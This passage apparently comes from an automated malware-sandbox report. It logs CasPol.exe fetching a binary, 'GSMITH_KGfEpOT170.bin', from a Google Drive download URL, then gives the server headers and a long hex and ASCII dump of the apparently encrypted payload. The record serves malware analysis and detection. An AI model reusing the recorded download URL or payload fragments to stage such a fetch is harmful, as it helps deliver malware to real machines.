                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              1192.168.11.2049808216.58.212.129443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                              TimestampkBytes transferredDirectionData
                                              2021-12-03 07:24:05 UTC2OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/lglu03i2is66lao2nkn5tgms2vaqhaoo/1638516225000/01591657853412424088/*/1wmG82hGvqKzvgNq4QIGmYB0d7zlHfgB8?e=download HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Cache-Control: no-cache
                                              Host: doc-04-7o-docs.googleusercontent.com
                                              Connection: Keep-Alive
                                              2021-12-03 07:24:05 UTC2INHTTP/1.1 200 OK
                                              X-GUploader-UploadID: ADPycdsXuCBle8AXOP0ZAEkAhqbxTKfKn0brniu34rGvulCQ7eKLKlIr2m-QMhHlSlEIhmZgKl0qkS-VYLhQRxlfghqASpNIsA
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Credentials: false
                                              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout
                                              Access-Control-Allow-Methods: GET,OPTIONS
                                              Content-Type: application/octet-stream
                                              Content-Disposition: attachment;filename="GSMITH_KGfEpOT170.bin";filename*=UTF-8''GSMITH_KGfEpOT170.bin
                                              Content-Length: 221760
                                              Date: Fri, 03 Dec 2021 07:24:05 GMT
                                              Expires: Fri, 03 Dec 2021 07:24:05 GMT
                                              Cache-Control: private, max-age=0
                                              X-Goog-Hash: crc32c=wb412g==
                                              Server: UploadServer
                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                              Connection: close
                                              2021-12-03 07:24:05 UTC6INData Raw: f3 e2 7b 20 f3 f1 25 c7 04 a3 96 68 c3 3a b3 4d 9c 1c 79 59 74 f7 79 eb 4b 74 e8 98 b8 b6 d4 3e 6b 21 2e d1 27 bc 0d 28 fd 4c fc 0d f5 11 41 43 cb e4 3a 7c 92 c0 32 d9 68 f7 01 ed dd 1c 72 68 8c 7e 75 73 fa db 9a 6e 7c 4a e2 38 1e b2 5c 16 a2 20 d2 bc 87 a1 ab 76 f0 3a 73 c7 79 87 98 1e 57 d2 3c 1f f3 e1 83 5b fc 19 e0 4d bc 40 2b a5 02 d2 e3 fc 92 b1 5f ef 26 4b 9f fd e1 2d ef d8 7e 82 ba 54 62 ec f7 a5 fd 47 d5 ac 09 52 07 61 41 02 70 f9 77 fc de 65 f3 55 f2 13 e7 7c d6 d0 e1 69 c4 a7 b2 6a 63 cb e2 d5 d1 da 60 88 df 15 9e e8 4d 78 50 86 d7 9d 19 d9 b8 58 70 55 bc 4c c3 08 dc d6 bb 69 a7 4c 46 98 80 81 3c 09 df bd 85 9f bf 53 cf f1 b0 c2 87 ea fd 19 a5 8e 68 06 ac f4 a3 26 dc 4e ed d5 d8 59 d2 18 b0 f3 09 ff 1a 69 6a fa be 16 96 52 be 51 1b 80 de f5 07
                                              Data Ascii: { %h:MyYtyKt>k!.'(LAC:|2hrh~usn|J8\ v:syW<[M@+_&K-~TbGRaApweU|ijc`MxPXpULiLF<Sh&NYijRQ
                                              2021-12-03 07:24:05 UTC9INData Raw: f2 59 8a 99 9c c0 a5 c5 cf c9 79 22 6e f5 6b 1a 0e 78 97 10 12 90 cc 7e 57 61 eb 19 d3 32 72 a6 78 81 0e 24 4b cd 2c e8 ab 28 f4 63 cf 44 fb 72 62 59 0a 27 3b 4a 5e f0 75 7c e9 a0 75 9b 12 c7 fe e9 c4 ef b0 ac 3a 0d 17 ce e0 34 e9 34 97 19 05 72 2b b0 c2 0a a8 55 e4 df 29 b6 3b 8d 67 6c 63 9a b0 8e 39 2c 29 05 f7 2e 15 ed 1a 58 23 b7 b1 a6 5a de 31 cd 60 e0 0d eb 4f e5 c2 84 2a 60 ef 12 d3 64 74 8c b1 06 e0 c6 16 89 94 9d 56 bc 7c ba 4a 33 3d 44 65 b7 83 25 14 07 7b 22 d5 d4 64 55 c9 9a b9 e0 bd 4f 99 b4 07 e4 96 1d d3 17 80 c8 eb ac fb 55 ab e4 b3 da 40 bd d4 a0 90 fe 3f 4a cf c4 c1 64 c2 52 51 5f 03 ce 2c e1 8a 4d 88 d6 b7 97 fb b5 5e 8b 9a b1 93 59 5f 8e 5f 04 79 51 77 37 04 36 6e 6a 95 0f 6c bf e5 35 c3 54 7c 04 42 21 c2 9b f4 6c 38 e9 a3 6e 19 a7 4d
                                              Data Ascii: Yy"nkx~Wa2rx$K,(cDrbY';J^u|u:44r+U);glc9,).X#Z1`O*`dtV|J3=De%{"dUOU@?JdRQ_,M^Y__yQw76njl5T|B!l8nM
                                              2021-12-03 07:24:05 UTC13INData Raw: 7a c4 42 b0 c5 50 58 f4 9c 8e cc 2c 81 14 23 cb 17 bf 71 32 9f f8 a1 bf 5b 1a c6 52 f4 98 60 59 ab 8d c9 b8 62 4e 39 04 6c 6f 16 be f9 25 ed a0 89 e5 8a 4e c3 9b ee cc 15 fb 2e 82 d2 8d 03 cb 5f 46 50 f2 1e fa d1 ec 11 f8 50 b3 9f 0c 20 82 59 7d 11 ea d5 f5 16 a5 15 fc 42 0f 37 39 6a 7f cf 1e f4 fc b2 6d a7 a3 4e a3 93 3c 3a c4 8b 7e 6f c0 60 24 5c 0d a9 17 07 f8 44 20 bd e0 84 d7 89 54 a9 ea 2a 3a 16 ca 4e ce 8c c0 2d a0 73 45 6e cc ba 4c dd 25 7d 73 05 fd 12 4f 25 5d de af 8a 88 02 16 0d f1 13 5d a7 c5 61 e7 f9 cf ae 7a a8 37 b1 d5 26 e8 a3 f5 89 bc cd 41 30 dd 73 78 4b 24 f0 c1 df b4 60 4f e4 42 c0 90 6b 7e 0e 24 f4 b0 4f 4f 1d ec f9 41 9a 46 3f 89 72 9f e2 1a 1b e4 11 dc 57 30 dd ba e0 2f 02 2e 44 4d 57 b4 c4 1a 13 aa f1 b0 a8 c9 eb b9 26 e5 75 d1 40
                                              Data Ascii: zBPX,#q2[R`YbN9lo%N._FPP Y}B79jmN<:~o`$\D T*:N-sEnL%}sO%]]az7&A0sxK$`OBk~$OOAF?rW0/.DMW&u@
                                              2021-12-03 07:24:05 UTC17INData Raw: b3 3f aa 38 d2 7a 58 12 90 06 97 49 a0 ea 5a 18 16 af ea 06 bd fa 22 ef a8 35 f3 8d 3a 30 6f a6 f2 cb 3d d9 be 4b 5b 7d 07 4e 93 4b cd fd df d4 a6 4c 7b e4 27 e0 3c 03 f7 e3 85 9f b9 40 03 d9 0f c1 8c ed e7 32 8d 68 69 06 aa d4 84 26 dc 44 c5 8b f6 2f d7 0b 9e fb b4 fd 1a 6f 7b d1 96 a9 d4 52 b8 59 3c 80 de fd 2f 78 6c 14 e4 05 e9 5b 50 ad b3 a7 8f 64 41 c8 c6 08 92 fa ce 0c 48 87 05 ec 07 f6 57 7c c8 7e 60 f2 cd 86 31 1c c6 7e 05 52 5b 2d 59 cf c3 51 2b 57 e1 05 1a ba 5e 4d 29 61 fd 81 14 bb 2c 46 ac a9 f8 45 c2 ef c1 59 9d 29 b7 02 5c 27 d7 c8 ae 9f 06 e5 50 96 1c 71 d8 39 e7 1f 2c 6e 6b 6b 1a 0e b3 41 3c 4f 81 cc 1b 40 73 c3 24 c4 cc 7a d1 6f b5 0f 22 41 9b 1a e8 ab 26 46 4b 0b 6c fb 74 4a 92 22 27 31 08 d5 89 75 6a 77 a5 57 f0 10 c7 f8 c3 07 b4 b0 e8
                                              Data Ascii: ?8zXIZ"5:0o=K[}NKL{'<@2hi&D/o{RY</xl[PdAHW|~`1~R[-YQ+W^M)a,FEY)\'Pq9,nkkA<O@s$zo"A&FKltJ"'1ujwW
                                              2021-12-03 07:24:05 UTC18INData Raw: ed f1 41 de 2b 72 6c fa 7d d9 2c c2 02 55 ad 41 f7 ec 8a a5 e9 8c d6 e5 92 ab 2d 0c 9a c9 25 2c c7 15 1e 98 fb 01 92 95 52 96 fb 4d ac 56 0e 6d 0f 97 83 90 e0 70 fa 19 be a3 9c cc 6b 67 0d 6c a5 8d a0 e2 f3 b7 59 29 3c 48 ca 1d 33 74 bb 28 6a 4f 9c f2 59 28 74 cb 7b 7d e7 79 78 f4 b9 a0 59 33 95 0d 34 f6 12 a8 69 10 59 f9 8d b9 8f 22 ef 74 f4 e6 64 fb b4 82 c2 fc fe 5f 3d 13 89 e3 2f bd e1 37 fa e0 89 a1 8a 98 0d b5 ed dd a4 ee 6e 84 a8 85 1b 35 5a 42 17 db 1b c4 11 46 ec 07 51 a2 fe 0c 20 8c d3 48 51 f2 f7 87 07 95 11 5e 5b 4e 2e 11 1b 7f cf 05 f1 b5 8b 34 d9 b2 59 5d 96 38 42 dc 80 74 ca c7 de 3f 58 69 bc 1c 01 5d 4d 9e 94 b7 86 fc 81 57 2d c0 5f 3e 3e e4 4c e6 11 d1 2a c5 89 33 6c c6 94 b4 44 25 7b 51 34 f5 9e 16 4a 25 df 87 1b a0 6a 1e 12 fd b7 7e a7
                                              Data Ascii: A+rl},UA-%,RMVmpkglY)<H3t(jOY(t{}yxY34iY"td_=/7n5ZBFQ HQ^[N.4Y]8Bt?Xi]MW-_>>L*3lD%{Q4J%j~
                                              2021-12-03 07:24:05 UTC19INData Raw: 29 1c 7e 8b da 97 1c de b8 58 7e 55 bc 4c bc 4a dc d6 f8 68 a4 4c 67 cc 00 e1 3c 09 df bd bb 98 bf 53 21 f1 b2 c3 c0 ec f6 19 aa d6 6b 06 b6 fc a3 27 dc 4e ed d5 ad 28 d1 18 be d3 09 ff 73 6e 6a fa b2 16 d6 52 a4 71 1b 81 de f7 07 26 19 13 e2 16 d7 71 ed af 30 a8 9e 4f 66 08 c4 08 8e d2 e9 0d 48 8d 2d b2 95 ff 51 6f e9 56 dd f0 6d 89 20 37 e1 2c 07 52 47 05 7e ce c3 5b 03 09 4e 0c 1c a9 7a 65 e8 63 40 8e 18 aa 0f 55 a5 b8 d2 4f d3 c1 d2 5f 8c 20 14 c2 5c 27 d3 df 50 9d d4 83 99 96 10 7b cf c7 ff 7f 2a 00 a2 6b 1a 04 42 b6 3e 10 9e ca 74 89 87 ca 2e d3 3e 78 8e 56 99 0e 22 40 e5 14 e8 ab 22 20 63 c9 60 fb 72 62 56 28 27 3b 47 5e 89 75 70 66 a0 7e 9b 12 c7 fe f6 ce b6 b0 e0 a1 0d 1d e5 ea 34 e9 3b 97 19 05 c5 86 b0 d1 10 a8 55 e5 fe 13 b3 3b 94 66 6c 63 c7
                                              Data Ascii: )~X~ULJhLg<S!k'N(snjRq&q0OfH-QoVm 7,RG~[Nzec@UO_ \'P{*kB>t.>xV"@" c`rbV(';G^upf~4;U;flc
                                              2021-12-03 07:24:05 UTC20INData Raw: 60 a1 54 1f aa 0f 97 8d 84 e3 9e d0 f3 a1 a8 9a e3 5a 99 0c 46 85 8d 8e e0 f5 a0 74 5a e5 48 cd 0f e5 51 97 2e 63 4d b8 c3 72 23 74 ca 4b 5e dc 54 7a e3 97 88 69 2d 6b 06 0b c9 2d be 56 47 9e 06 72 b5 78 07 ee 67 c4 9a 6a 67 b4 86 da 9b 62 5f 2c 05 81 6a 02 3d e1 36 e9 a0 89 e5 87 4e c3 9b ea d2 0e 65 25 8f c5 96 1b 24 5a 76 ac d8 37 d3 3e 7e 83 07 57 c7 84 63 d0 86 71 53 3d 8a c2 cc 01 95 06 f8 53 f0 36 15 67 69 c3 15 f1 f3 99 67 a3 b3 a7 5c be 13 20 cf 84 7e 79 d2 83 db 71 23 bb 0b 2d e1 4f da bc dd 82 e6 75 7e 66 c7 74 0a 0d df 48 e6 06 c4 35 54 5a 1f 65 e4 8f 64 46 2f 70 60 09 f3 9e 01 21 4b 21 86 3d 8b 15 0f 16 fb 8e 06 b9 3b 61 e3 60 e4 ab 48 fb bf 4c 2a 28 d7 ee f9 81 bf 6b 8e 0d ab 8a af 2f 32 da d0 c7 95 60 c8 ec 6a 5b b8 6b 74 37 49 2f b2 49 61
                                              Data Ascii: `TZFtZHQ.cMr#tK^Tzi-k-VGrxgjgb_,j=6Ne%$Zv7>~WcqS=S6gig\ ~yq#-Ou~ftH5TZedF/p`!K!=;a`HL*(k/2`j[kt7I/Ia
                                              2021-12-03 07:24:05 UTC22INData Raw: dc 61 1c a0 fc ab 3d 22 4f c1 c6 f0 07 36 1a b0 d5 21 17 18 69 6c 95 c6 16 d6 58 b4 6d 17 80 d6 e8 08 d8 6d 38 e5 11 c3 75 4f b0 a3 ad 9e 47 76 18 3a 09 b8 d9 ee 17 36 94 2d b2 03 54 4e 7e eb 56 d5 ea 33 81 0c 24 e8 04 e2 50 5d 03 56 29 c1 5b 05 66 99 05 1c a3 7e 7e e4 63 f5 9f e6 ab 2c 47 8d bc c8 4f d5 af 2f 5f 8c 2a b7 35 5c 27 d7 d5 49 91 0e 82 86 9a e2 7a e3 cc e2 68 54 18 a2 6b 1e a6 bb b2 32 10 98 dc 8a 88 5f c1 39 df 32 70 91 44 7d 0f 0e 43 ce 11 d0 d8 dc d5 9c e3 6e fb 72 79 68 26 27 f0 48 5e 89 5f 6a 66 b1 7d b3 ed c7 fe e1 ab 82 b0 ee ab 62 28 ce e0 3e e3 e9 24 19 05 df a3 98 e7 10 a8 5f e9 c6 31 4c 3b 9a 6c 7f 67 af b0 8a 28 2e 8c 37 f7 2e 1e 94 f9 24 23 b6 ba 88 66 94 31 c7 42 8f 47 eb 45 e6 4a 24 9d 94 fc 17 cf 69 45 a8 90 07 e1 a9 51 80 85
                                              Data Ascii: a="O6!ilXmm8uOGv:6-TN~V3$P]V)[f~~c,GO/_*5\'IzhTk2_92pD}Cnryh&'H^_jf}b(>$_1L;lg(.7.$#f1BGEJ$iEQ
                                              2021-12-03 07:24:05 UTC23INData Raw: 70 f5 d2 a0 dd 78 78 e5 98 91 90 32 b9 08 31 b5 23 bb 6e 3c ef 4e 9a 69 5f 0b f4 67 f0 98 7b ff ac 78 db 90 71 21 1f 13 92 6a 12 42 e1 36 e3 cf f5 e1 9c ba c8 ae fe df 06 ee 2a 8f 28 93 37 30 49 40 4f ca 1f c2 28 15 f5 f9 56 e1 9d 0a 4f 81 70 59 1b 94 fa df 05 91 1f 66 5c 26 19 39 62 75 d9 f1 e3 db ac 6a b4 a0 59 4c 96 07 c6 dd ac 7d 70 c5 9a 25 61 0b a4 e2 06 d3 59 f5 9d d7 95 f8 8b 6e 4e d4 a1 39 3a cf 5b f5 13 c0 3c ae 46 cd 6d e0 be 4f 43 1d 11 86 e5 08 96 07 f3 51 d7 8e 20 23 14 36 12 fb 84 32 a3 c5 e3 c8 62 cf 81 70 80 51 9b 9d 20 c0 3e 75 a9 b6 e5 3d 4c f9 75 50 d4 08 ce b5 d4 91 60 4b f9 59 43 ee 4e 74 26 65 78 07 5f 56 aa c4 b3 4b b2 66 12 8c a5 e4 7e 1a 1b c5 10 a8 f8 6f dd be f9 34 8f 50 61 47 7f c9 48 ad 03 b3 66 98 e3 c3 c3 c7 09 e0 ae ca dc
                                              Data Ascii: pxx21#n<Ni_g{xq!jB6*(70I@O(VOpYf\&9bujYL}p%aYnN9:[<FmOCQ #62bpQ >u=LuP`KYCNt&ex_VKf~o4PaGHf
                                              2021-12-03 07:24:05 UTC24INData Raw: b9 a2 9e 49 41 2c c4 08 9e 52 e1 0c 48 89 f0 bb 04 f6 51 6d f8 21 ee e9 b3 88 20 37 ea 04 0c 51 5d 03 56 eb c3 5b 09 89 e9 05 1c ad a9 8e ea 63 fd 85 07 d2 33 4c db b0 c8 4f d7 e8 de 5c 8c 26 f0 ef 5c 27 d7 5f 58 9d 0e 8e 44 5b 1e 7b cf c5 fa 06 19 18 dc 63 1a 04 a0 97 33 13 90 cc 5c ad 73 c3 24 53 3a 78 8e 52 5e a1 20 41 e5 16 f7 d1 11 33 1d c1 6e fb 76 4a 56 21 27 3d 60 7a 89 75 60 e6 a8 7f 9b 16 1a 6f e9 c4 b6 b2 f1 da 3e 04 b0 e8 34 e9 30 bf 16 06 df 80 98 f4 10 a8 5f 65 cc 19 b3 3f 47 15 6e 63 8f b2 91 08 1d 18 32 ff 2e 1f 9d 01 02 21 b6 bd 88 56 94 31 c7 ea 87 46 eb 4b 32 91 91 45 2c c7 16 d9 62 52 c3 f6 07 e0 a3 34 82 95 97 5a 83 17 f4 4a 35 58 4b 7b 85 e6 05 1e 06 71 2e eb 66 67 0a cd ea fb 1e bc 53 61 9d 15 e4 b6 bf bc 46 80 36 e0 bc 6a 06 f4 e6
                                              Data Ascii: IA,RHQm! 7Q]V[c3LO\&\'_XD[{c3\s$S:xR^ A3nvJV!'=`zu`o>40_e?Gnc2.!V1FK2E,bR4ZJ5XK{q.fgSaF6j
                                              2021-12-03 07:24:05 UTC26INData Raw: af e0 36 e3 b3 88 fe 87 a3 d9 b7 fc c0 19 ea d0 92 fa 98 0a 3e 44 bc 41 d2 04 d4 2a 0a ee 16 4c d2 af f2 21 aa 7a 48 1a fb ca 09 16 9e 08 d6 59 15 37 28 79 60 e9 f1 e3 db 97 74 b6 af 71 4f 93 10 32 cf 95 61 4f c5 85 25 61 14 a1 25 f9 fe 70 d4 cf ee 84 fc 8d 75 55 f8 4c 23 16 dd 57 f9 0e 3e 2c 86 51 22 67 d6 6a 77 4d 3a 67 6a 01 f7 8f 0b 3a 69 21 86 3d 9a 2a 0f 13 fb 95 13 a2 aa 74 ce 62 c5 bd 69 9f 75 a0 ce 20 d1 23 ea b3 48 e4 15 3e db 64 47 bf 00 f2 cb f1 8e 5b 5c f5 6a 4a 8b 74 41 d8 60 da b7 58 7e 8d f3 cf 58 a9 60 2e 92 67 af 87 1b 37 e0 0c c7 d0 47 cc bb e1 0d 8a 3d 5b 5e 6c d6 c6 0b 0e 9d 42 4e a9 ef d6 e9 37 e4 73 f3 d9 8b 65 69 5f 8d 2d e0 4d 56 05 0e 3f fb af 9c a1 ba 6d a9 c4 72 eb 74 85 89 15 7f c3 3d 1f f9 f2 84 41 ef 02 e0 5c a7 5f 3c 5b 03
                                              Data Ascii: 6>DA*L!zHY7(y`tqO2aO%a%puUL#W>,Q"gjwM:gj:i!=*tbiu #H>dG[\jJtA`X~X`.g7G=[^lBN7sei_-MV?mrt=A\_<[
                                              2021-12-03 07:24:05 UTC27INData Raw: ba 65 74 e7 79 2b 94 17 bb 11 42 7f af 1e c2 f8 c0 d2 5e 9f 30 da da 53 36 cd c9 41 8c 26 9c 98 96 16 6a c0 d6 f4 a9 39 0e a0 7a 15 2c b6 be 3e 1a 83 c4 65 86 69 d2 20 05 e4 6b 81 54 92 01 0a 53 e4 14 e2 a7 33 25 79 1f 7d f4 70 73 57 0a 35 3a 48 54 84 64 65 7c 76 6c 94 10 d6 f1 c3 d6 b7 b0 e4 b2 00 0c c1 fa 25 e4 e2 41 0a 0a dd 97 bf f8 02 a9 55 ef d7 1c a2 34 80 b0 7f 6c 9e b5 99 f2 39 d7 c1 dc 2e 1f 98 3a 5c 21 a7 b4 b1 76 82 20 c8 42 99 47 eb 45 ec d5 9f 2a 30 ee 12 d3 5b 78 ad ff 06 e8 89 55 09 94 97 10 34 13 f4 4a 30 26 4e 15 98 ed 6a 1e 68 6f 25 fd 92 4e 07 cf f5 ef f3 a9 54 8b 8d 5a ee be 4b bc 46 86 db f3 ad f8 24 ab e4 b9 d1 47 c9 ce e0 cb dc 50 19 cf c4 cb 4c 7c 6f 08 71 84 e6 02 eb 3d 50 48 1b 17 97 fb b4 4a f7 df a3 82 40 54 e5 13 5c 79 51 7d
                                              Data Ascii: ety+B^0S6A&j9z,>ei kTS3%y}psW5:HTde|vl%AU4l9.:\!v BGE*0[xU4J0&Njho%NTZKF$GPL|oq=PHJ@T\yQ}
                                              2021-12-03 07:24:05 UTC28INData Raw: 37 94 17 f6 59 0a 1f 2a 63 7f c5 0d 8d 6f 99 76 ad b7 5c 75 81 11 38 d6 91 7a 07 4e 9e 25 7a 1c b8 0d 01 eb 74 5f be cc 80 ea 06 78 4a c2 5e 2c 02 d8 64 45 17 c0 27 b2 d7 0c 6c cc bd 4c 75 24 7d 73 0d 7b a1 10 25 5c f7 36 11 88 08 34 48 fb 9f 08 b0 13 ed e4 62 cf af 63 87 51 b5 c1 08 d9 3b f5 8f ae 68 3e 32 dd 74 43 db 35 fb dd e6 96 c2 5e e5 7d 4d 1c 54 74 26 60 54 a1 42 74 8a fd f5 5f a6 78 b2 a6 78 b7 78 09 16 ff 03 c0 cc f3 cc b7 f6 11 05 3f 49 50 57 6a c6 1a 1f a4 7b bd be 53 ef de 35 e9 65 63 f3 8b 6e 78 40 32 2a e1 4d 47 3e 0e 20 d2 b6 af 95 aa 76 ba 4e 61 c7 79 9c 8b 19 46 d5 2d 18 7d 56 9b 81 ea 85 93 68 bd 40 21 b6 0a c3 eb e8 ba ab 5c ef 20 5c 12 fa 61 2d ee cb 7c 8c 0c 4c 73 5d d6 79 dc ff de 42 d5 7f 40 02 39 7a 44 9d 12 1e 96 17 92 39 c1 7d
                                              Data Ascii: 7Y*cov\u8zN%zt_xJ^,dE'lLu$}s{%\64HbcQ;h>2tC5^}MTt&`TBt_xxx?IPWj{S5ecnx@2*MG> vNayF-}Vh@!\ \a-|Ls]yB@9zD9}
                                              2021-12-03 07:24:05 UTC29INData Raw: 13 84 a4 bf 7e d6 90 ca 74 fa 55 c2 2e d9 21 5a 90 db a8 0e 22 40 f6 37 f7 b3 af 01 63 c9 6f e8 56 73 5d 3d 3f 2a 6b 48 97 5d 7c 67 a0 75 8a 17 d1 ef cf d2 a9 a8 c6 b7 0c 1d c4 f1 16 f8 10 f8 3e 04 df 8c a1 f2 01 8b 3a cd c5 19 b9 2a b8 71 03 4a 8e b0 84 39 0c 18 23 dd 2f 1f 93 38 7a 4c 9d ba a0 78 85 35 db 7b 8b c8 5c 20 c3 c5 93 4f 3f ca 0d 99 ef 7f ac ff 07 f3 88 4a ac 8b bf 41 8a 05 eb 0a 1b 21 43 7a 8f 9f 4f 15 07 7b 37 db 89 40 44 ee 9a cb e1 bd 4f 8c bb 5b c1 be 0c bd 46 8a e0 b6 a8 94 01 83 ca bb d1 41 a6 96 a0 90 f5 43 31 c8 d5 cd 5d a4 3f 6b 58 15 ec dc ed 9b 61 b2 91 2d b1 94 e2 59 e4 c4 6d 94 59 8d 90 37 56 a7 44 7a 8a cd f1 c6 69 a2 0f 6d b8 f5 04 f3 1f 25 04 48 f5 d1 98 c9 79 17 be cc 69 0f 29 72 66 c0 a0 27 d3 3d fd 5b bf 00 dc fa 85 a5 f8
                                              Data Ascii: ~tU.!Z"@7coVs]=?*kH]|gu>:*qJ9#/8zLx5{\ O?JA!CzO{7@DO[FAC1]?kXa-YmY7VDzim%Hyi)rf'=[
                                              2021-12-03 07:24:05 UTC31INData Raw: 7f 5b cd 40 2d e8 cd 60 e8 06 ca 3b 30 73 22 6c cc b6 6f 59 33 6e 76 1a e6 91 0f 2f a3 de ab 1c 9a 04 0d 15 d3 85 03 a7 cf 7f c4 71 c0 ae 61 8f 5f ba 2b 21 ec 1b e4 82 ae 7f 11 23 dd 75 5a 00 36 f0 cb ec b9 74 4f ee 60 73 a4 6a 74 2c 15 e4 b0 49 7c 95 eb e6 41 a1 6f 3f 98 77 ad 87 1b 37 e2 11 c6 56 44 dd ba e0 14 9e 35 57 48 7f dc c9 05 04 7c 6b 9c bb d2 ca d7 0c f7 72 f9 d1 16 51 78 4a e3 2b e4 52 4e 05 15 20 c3 b3 98 b6 55 77 9c 35 62 cd 61 1d b0 0f 57 d2 36 0c f7 fe 9b 48 f3 19 f1 42 a4 be 2a 89 17 d0 90 c3 93 b1 55 80 66 4a 9f f7 ed bc ef d8 71 8e 08 43 71 57 fe 79 d3 e0 db 1e c5 5f 59 18 24 69 c0 a5 ac 8c a9 04 9d 38 c3 7f 99 1c 46 be b9 47 b7 c8 84 82 3e b4 c2 bc b5 f1 3b c8 9f 3a f3 96 26 01 80 8a f6 9b 2c d5 ae c8 49 37 42 b3 6c 50 cf d9 f7 79 ab
                                              Data Ascii: [@-`;0s"loY3nv/qa_+!#uZ6tO`sjt,I|Ao?w7VD5WH|krQxJ+RN Uw5baW6HB*UfJqCqWy_Y$i8FG>;:&,I7BlPy
                                              2021-12-03 07:24:05 UTC32INData Raw: 7f ad 7f 92 09 39 ff c7 ce b4 b5 a4 30 12 17 fd ca 28 e4 34 9e 05 fb de aa b5 d7 3c b2 48 e8 c4 10 a5 c5 9b 4a 6e 74 82 b0 87 37 27 ff 4d db 2c 34 9c 11 26 dc 49 44 b7 79 bf 3b cf 6f c5 d7 f4 42 c1 c6 85 4e 29 ca 58 ce b4 00 a9 b5 0e d1 10 4d a3 87 a7 52 ab 2e f4 4a 33 74 42 7a 94 fa 66 3f 28 71 2c ea 66 67 79 cd ed e5 e0 b5 5d 61 9d 66 eb e8 2c bc 46 84 bb aa ab 94 0d a0 fd b5 d1 4f df 10 a1 bc fd 47 15 cf cc d2 b2 8d 7c 53 72 17 cd cd e6 88 28 d2 97 3c 9d d1 b5 59 e4 dd 81 91 53 06 89 30 5c 3d 51 7d 91 05 ec c8 0c 95 07 74 4c e7 01 df 3e 0f 1e 4e 2b d9 88 1d 7e 11 fd a8 65 0f 23 68 98 c1 38 2a d4 52 91 5a bf 0a 11 c9 ae b2 c3 8c b5 b2 9a b3 d9 d1 a7 c2 48 ec c6 3d 5a f6 32 0b bf 7d 52 a4 96 44 ba a8 71 4f 0d 80 8b 87 db 56 2c d8 90 a1 b1 e6 6a d6 17 40
                                              Data Ascii: 90(4<HJnt7'M,4&IDy;oBN)XMR.J3tBzf?(q,fgy]af,FOG|Sr(<YS0\=Q}tL>N+~e#h8*RZH=Z2}RDqOV,j@
